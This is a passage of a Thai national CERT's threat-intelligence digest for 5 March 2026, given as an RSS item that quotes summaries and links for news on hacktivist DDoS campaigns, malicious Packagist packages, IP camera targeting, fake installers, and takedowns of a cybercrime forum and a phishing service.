"Since late February 2026, the Middle East has experienced unprecedented kinetic warfare. Following the collapse of nuclear negotiations and a period of internal Iranian instability, a massive, coordinated military campaign dubbed Operation Epic Fury by the United States, also known as Operation Roaring Lion in Israel, was launched on February 28, 2026. This military offensive, which resulted in the death of Iran’s supreme leader and the destruction of over 2,000 strategic targets, has acted as a primary catalyst for global hacktivist mobilization. As the physical conflict expands across many countries in the region, pro-Iranian and allied "axis of resistance" hacktivist groups have pivoted from baseline activity to aggressive, retaliatory distributed denial of service (DDoS) campaigns targeting government and financial infrastructure across the Middle East."<br />
<a href="https://www.radware.com/security/threat-advisories-and-attack-reports/ddos-activity-following-operation-epic-fury-roaring-lion/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.radware.com/security/threat-advisories-and-attack-reports/ddos-activity-following-operation-epic-fury-roaring-lion/</a><br />
<a href="https://thehackernews.com/2026/03/149-hacktivist-ddos-attacks-hit-110.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/149-hacktivist-ddos-attacks-hit-110.html</a></li>
<li><strong>Malicious Packagist Packages Disguised As Laravel Utilities Deploy Encrypted RAT</strong><br />
"Socket's Threat Research Team identified a remote access trojan (RAT) distributed across multiple Packagist (PHP) packages published by the threat actor nhattuanbl (nhattuanbl@gmail[.]com). Two packages, nhattuanbl/lara-helper and nhattuanbl/simple-queue, ship an identical payload in src/helper.php. A third package, nhattuanbl/lara-swagger, carries no malicious code itself but lists nhattuanbl/lara-helper as a hard Composer dependency, meaning that installing it pulls in the RAT automatically."<br />
<a href="https://socket.dev/blog/malicious-packagist-packages-disguised-as-laravel-utilities" target="_blank" rel="noopener noreferrer nofollow ugc">https://socket.dev/blog/malicious-packagist-packages-disguised-as-laravel-utilities</a><br />
<a href="https://thehackernews.com/2026/03/fake-laravel-packages-on-packagist.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://thehackernews.com/2026/03/fake-laravel-packages-on-packagist.html</a></li>
<li><strong>Interplay Between Iranian Targeting Of IP Cameras And Physical Warfare In The Middle East</strong><br />
"As highlighted in the Cyber Security Report 2026, cyber operations have increasingly become an additional tool in interstate conflicts, used both to support military operations and to enable ongoing battle damage assessment (BDA). During the 12-day conflict between Israel and Iran in June 2025, the compromise of cameras was likely used to support BDA and/or target-correction efforts. In the current Middle East conflict, Check Point Research has observed intensified targeting of cameras beginning in the first hours of hostilities, including a sharp increase in exploitation attempts against IP cameras not only in Israel but also across Gulf countries: specifically the UAE, Qatar, Bahrain, and Kuwait, as well as similar activity in Lebanon and Cyprus. This activity originated from multiple attack infrastructures that we attribute to several Iran-nexus threat actors."<br />
<a href="https://research.checkpoint.com/2026/interplay-between-iranian-targeting-of-ip-cameras-and-physical-warfare-in-the-middle-east/" target="_blank" rel="noopener noreferrer nofollow ugc">https://research.checkpoint.com/2026/interplay-between-iranian-targeting-of-ip-cameras-and-physical-warfare-in-the-middle-east/</a><br />
<a href="https://www.theregister.com/2026/03/04/iranian_hacking_attempts_ip_cameras/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/04/iranian_hacking_attempts_ip_cameras/</a></li>
<li><strong>“Malware, From The Outside!”: How a Threat Actor Used Fake OpenClaw Installers To Infect Systems With GhostSocks And Information Stealers</strong><br />
"Information stealers continue to be an initial access vector for severe attacks against publicly facing systems, such as the Snowflake customer database compromise in 2024, and a Romanian oil pipeline operator compromise in 2026. This blog details an investigation into malicious GitHub repositories posing as OpenClaw installers that were available between the 2nd and 10th of February 2026. The OpenClaw installers were fake with low detection rates, and distributed information stealers that used a novel packer called Stealth Packer."<br />
<a href="https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer</a><br />
<a href="https://www.theregister.com/2026/03/04/fake_openclaw_installers_malware/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.theregister.com/2026/03/04/fake_openclaw_installers_malware/</a></li>
</ul>
<p dir="auto"><strong>General News</strong></p>
<ul>
<li><strong>United States Leads Dismantlement Of One Of The World’s Largest Hacker Forums</strong><br />
"The Department of Justice announced today the seizure of the LeakBase database, one of the world’s largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. According to an affidavit unsealed on March 3, the LeakBase forum had over 142,000 members and more than 215,000 messages between members. Available on the open web and in English, the forum had an enormous and continuously updated archive of hacked databases including many from high profile attacks, including hundreds of millions of account credentials."<br />
<a href="https://www.justice.gov/opa/pr/united-states-leads-dismantlement-one-worlds-largest-hacker-forums" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.justice.gov/opa/pr/united-states-leads-dismantlement-one-worlds-largest-hacker-forums</a><br />
<a href="https://www.bleepingcomputer.com/news/security/fbi-seizes-leakbase-cybercrime-forum-data-of-142-000-members/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/fbi-seizes-leakbase-cybercrime-forum-data-of-142-000-members/</a><br />
<a href="https://therecord.media/leakbase-cybercrime-fbi-europe-takedown" target="_blank" rel="noopener noreferrer nofollow ugc">https://therecord.media/leakbase-cybercrime-fbi-europe-takedown</a><br />
<a href="https://cyberscoop.com/leakbase-cybercrime-forum-seized/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/leakbase-cybercrime-forum-seized/</a></li>
<li><strong>Global Phishing-As-a-Service Platform Taken Down In Coordinated Public-Private Action</strong><br />
"A major phishing-as-a-service platform used to bypass multi-factor authentication (MFA) and enable large-scale account compromise has been disrupted following a coordinated international operation supported by Europol. The service, known as Tycoon 2FA, provided cybercriminals with a subscription-based toolkit designed to intercept live authentication sessions and gain unauthorised access to online accounts, including those protected by additional security layers."<br />
<a href="https://www.europol.europa.eu/media-press/newsroom/news/global-phishing-service-platform-taken-down-in-coordinated-public-private-action" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.europol.europa.eu/media-press/newsroom/news/global-phishing-service-platform-taken-down-in-coordinated-public-private-action</a><br />
<a href="https://www.trendmicro.com/en_us/research/26/c/tycoon2fa-takedown.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.trendmicro.com/en_us/research/26/c/tycoon2fa-takedown.html</a><br />
<a href="https://www.proofpoint.com/us/blog/threat-insight/disruption-targets-tycoon-2fa-popular-aitm-phaas" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.proofpoint.com/us/blog/threat-insight/disruption-targets-tycoon-2fa-popular-aitm-phaas</a><br />
<a href="https://www.bleepingcomputer.com/news/security/europol-coordinated-action-disrupts-tycoon2fa-phishing-platform/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.bleepingcomputer.com/news/security/europol-coordinated-action-disrupts-tycoon2fa-phishing-platform/</a><br />
<a href="https://cyberscoop.com/tycoon-2fa-phishing-kit-takedown-microsoft/" target="_blank" rel="noopener noreferrer nofollow ugc">https://cyberscoop.com/tycoon-2fa-phishing-kit-takedown-microsoft/</a><br />
<a href="https://www.infosecurity-magazine.com/news/global-takedown-tycoon2fa-phishing/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.infosecurity-magazine.com/news/global-takedown-tycoon2fa-phishing/</a><br />
<a href="https://www.securityweek.com/tycoon-2fa-phishing-platform-dismantled-in-global-takedown/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/tycoon-2fa-phishing-platform-dismantled-in-global-takedown/</a></li>
<li><strong>The Whitelist Illusion – When Your Trusted List Becomes a Billion Dollar Attack Path</strong><br />
"When a bank or institution holds significant digital assets on a public blockchain, something unique happens: every aspect of their security posture becomes visible to attackers. On-chain balances are public. Transaction patterns are traceable. The addresses you interact with, your whitelist, are not a secret. They are broadcast to the entire world with every transaction. For professional threat groups, particularly state-sponsored actors like North Korea’s Lazarus Group (responsible for over $2B in crypto theft since 2017), this transparency is a gift. They don’t need to guess your security architecture. They can map it."<br />
<a href="https://blog.checkpoint.com/crypto/the-whitelist-illusion-when-your-trusted-list-becomes-a-billion-dollar-attack-path/" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.checkpoint.com/crypto/the-whitelist-illusion-when-your-trusted-list-becomes-a-billion-dollar-attack-path/</a></li>
<li><strong>The Most Common Swap Scams In 2026, And How To Avoid Them</strong><br />
"Crypto swaps are fast and permissionless, which is exactly why scammers love them. Before you hit “Swap,” decide where you’ll execute: a DEX router you trust (Uniswap, 1inch) or a centralized venue where you can sanity-check tickers, fees, and withdrawals (Binance, Kraken, Coinbase). A simple way to cut risk is by reducing unknown interfaces and “too-good-to-be-true” rate widgets. If you’re comparing venues, using a low fee crypto exchange can help you avoid hidden costs scammers often mask with wide spreads or fake fee breakdowns, especially if you stick to well-known brands and consistent workflows."<br />
<a href="https://hackread.com/common-swap-scams-2026-how-to-avoid/" target="_blank" rel="noopener noreferrer nofollow ugc">https://hackread.com/common-swap-scams-2026-how-to-avoid/</a></li>
<li><strong>Cybersecurity Professionals Are Burning Out On Extra Hours Every Week</strong><br />
"Cybersecurity professionals in the U.S. are working an average of 10.8 extra hours per week beyond their contracted schedules, according to survey data collected from 300 cybersecurity and IT leaders by Sapio Research. That figure effectively adds a sixth working day to the standard week for a large portion of the field. Nearly half of respondents reported working 11 or more overtime hours weekly, and one in five logged more than 16 additional hours. The psychological strain is measurable. Nearly half of respondents said their job feels emotionally exhausting more often than it feels rewarding, a sentiment most pronounced among C-level executives. A significant share said they are unable to take time off without returning to a significant backlog of stress, and roughly a third reported weekly anticipatory anxiety about the upcoming work week."<br />
<a href="https://www.helpnetsecurity.com/2026/03/04/ciso-cybersecurity-workforce-burnout/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/04/ciso-cybersecurity-workforce-burnout/</a></li>
<li><strong>Why Workforce Identity Is Still a Vulnerability, And What To Do About It</strong><br />
"Most organizations believe they have workforce identity under control. New hires are verified. Accounts are provisioned. Multi-factor authentication is enforced. Audits are passed. Then a breach happens, often through an account that was “properly secured.” But the problem can be traced back to the fact that identity verification, provisioning, authentication, and recovery operate as separate events, not a continuous system of trust. When trust breaks between those checkpoints, attackers don’t need to defeat strong authentication. They simply walk around it."<br />
<a href="https://www.helpnetsecurity.com/2026/03/04/workforce-identity-assurance/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.helpnetsecurity.com/2026/03/04/workforce-identity-assurance/</a></li>
<li><strong>Mobile Malware Evolution In 2025</strong><br />
"Starting from the third quarter of 2025, we have updated our statistical methodology based on the Kaspersky Security Network. These changes affect all sections of the report except for the installation package statistics, which remain unchanged. To illustrate trends between reporting periods, we have recalculated the previous year’s data; consequently, these figures may differ significantly from previously published numbers. All subsequent reports will be generated using this new methodology, ensuring accurate data comparisons with the findings presented in this article."<br />
<a href="https://securelist.com/mobile-threat-report-2025/119076/" target="_blank" rel="noopener noreferrer nofollow ugc">https://securelist.com/mobile-threat-report-2025/119076/</a></li>
<li><strong>Automate Or Orchestrate? Implementing a Streamlined Remediation Program To Shorten MTTR</strong><br />
"Almost all security teams want to reduce their Mean Time to Remediate (MTTR). And for good reason: research from 2024 found that it takes an average of 4.5 months to remediate critical vulnerabilities. The problem is that most organizations are going about it all wrong. Their approaches lack nuance: some teams respond to every exposure with a fire drill, others with a simple patch. Neither approach really works."<br />
<a href="https://securityaffairs.com/188917/security/automate-or-orchestrate-implementing-a-streamlined-remediation-program-to-shorten-mttr.html" target="_blank" rel="noopener noreferrer nofollow ugc">https://securityaffairs.com/188917/security/automate-or-orchestrate-implementing-a-streamlined-remediation-program-to-shorten-mttr.html</a></li>
<li><strong>Threat Spotlight: The Business Risks Of Pirate Software</strong><br />
"Over the last month, Barracuda’s SOC tools and analysts have detected multiple instances of users trying to download and activate pirate or cracked versions of software and unauthorized installers onto corporate endpoints. Pirate and cracked software are traditionally associated with gaming — players looking for free upgrades, enhancements or special hacks. Pirate software refers to programs that have been illegally copied, while cracked software refers to programs that have been modified to bypass licensing or protection mechanisms designed to prevent piracy."<br />
<a href="https://blog.barracuda.com/2026/03/04/threat-spotlight-business-risks-pirate-software" target="_blank" rel="noopener noreferrer nofollow ugc">https://blog.barracuda.com/2026/03/04/threat-spotlight-business-risks-pirate-software</a><br />
<a href="https://www.securityweek.com/how-pirated-software-turns-helpful-employees-into-malware-delivery-agents/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.securityweek.com/how-pirated-software-turns-helpful-employees-into-malware-delivery-agents/</a></li>
<li><strong>The Five Pillars Of Software Assurance In System Acquisition</strong><br />
"Today’s systems are increasingly software-intensive and complex with a growing reliance on third-party technology. Through software reuse, systems can be assembled faster with less development cost. Traditionally, systems were primarily hardware-driven, and operational risks were primarily linked to reliability. Now systems are largely software-based. They do not wear out like hardware, so critical risks are different. Software components almost without exception contain vulnerabilities that are difficult to manage directly. Inheritance of these vulnerabilities through the supply chain, as more software is acquired, increases the management challenges and magnifies the risk of potential compromise. In addition, we have seen situations where suppliers unintentionally become propagators of malware and ransomware (e.g., SolarWinds) through features that provide automatic updates. Attacks on the software supply chain (e.g., Shai-Hulud, a self-replicating worm) are increasingly frequent and devastating."<br />
<a href="https://www.sei.cmu.edu/blog/the-five-pillars-of-software-assurance-in-system-acquisition/" target="_blank" rel="noopener noreferrer nofollow ugc">https://www.sei.cmu.edu/blog/the-five-pillars-of-software-assurance-in-system-acquisition/</a></li>
</ul>
<p dir="auto"><strong>References</strong><br />
Electronic Transactions Development Agency (ETDA) <img src="/assets/uploads/files/1772691886524-aea3decd-6598-4959-9c09-f5cceaf7b5d7-image.png" alt="aea3decd-6598-4959-9c09-f5cceaf7b5d7-image.png" class=" img-fluid img-markdown" /></p>
]]></description><link>https://webboard-nsoc.ncsa.or.th/topic/2673/cyber-threat-intelligence-05-march-2026</link><guid isPermaLink="true">https://webboard-nsoc.ncsa.or.th/topic/2673/cyber-threat-intelligence-05-march-2026</guid><dc:creator><![CDATA[NCSA_THAICERT]]></dc:creator><pubDate>Thu, 05 Mar 2026 06:24:48 GMT</pubDate></item></channel></rss>